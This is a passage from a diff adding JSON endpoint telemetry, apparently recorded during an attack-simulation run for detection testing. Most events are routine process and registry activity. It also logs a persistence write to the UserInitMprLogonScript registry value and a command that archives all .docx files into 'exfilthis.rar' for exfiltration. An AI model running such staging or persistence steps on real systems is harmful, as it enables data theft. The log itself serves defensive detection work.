"registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Environment", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Environment\\UserInitMprLogonScript", + "registry_value": "UserInitMprLogonScript", + "timestamp": 131883573444170000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" + }, + { + "event_type": "process", + "pid": 6488, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883573444170000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" + }, + { + "event_type": "process", + "pid": 4436, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573444170000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 2900, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573444370000, + "unique_pid": "{42FC7E13-CBE0-5C05-0000-001058C05401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2900, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573444330000, + "unique_pid": "{42FC7E13-CBE0-5C05-0000-001058C05401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2900, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573444330000, + "unique_pid": "{42FC7E13-CBE0-5C05-0000-001058C05401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2900, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573444330000, + "unique_pid": "{42FC7E13-CBE0-5C05-0000-001058C05401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2900, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573444330000, + "unique_pid": "{42FC7E13-CBE0-5C05-0000-001058C05401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2900, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573444330000, + "unique_pid": "{42FC7E13-CBE0-5C05-0000-001058C05401}" + }, + { + "event_type": "process", + "pid": 2900, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573444330000, + "unique_pid": "{42FC7E13-CBE0-5C05-0000-001058C05401}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", + "registry_value": "cbjrefuryy.rkr", + "timestamp": 131883573445259984, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883573445259984, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"rar a -r exfilthis.rar *.docx\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 8008, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573450980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 8008, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573450890000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 8008, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573450890000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 8008, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573450890000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 8008, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573450890000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 8008, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573450890000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}" + }, + { + "event_type": "process", + "pid": 8008, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573451040000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010D9EA5401}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4696, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573451150000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4696, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573451040000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4696, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573451040000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4696, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573451040000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4696, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573451040000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4696, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573451040000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}" + }, + { + "event_type": "process", + "pid": 4696, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573451200016, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010EAEB5401}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Wbem", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Wbem\\CIMOM", + "registry_value": "CIMOM", + "timestamp": 131883573453700016, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573454020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573454020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573454020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573454020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573454020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573454020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573454020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573454020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573454020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573454020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "WmiPerfClass.dll", + "image_path": "C:\\Windows\\System32\\wbem\\WmiPerfClass.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wevtapi.dll", + "image_path": "C:\\Windows\\System32\\wevtapi.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573454170000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573454330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573454330000, + "unique_pid": 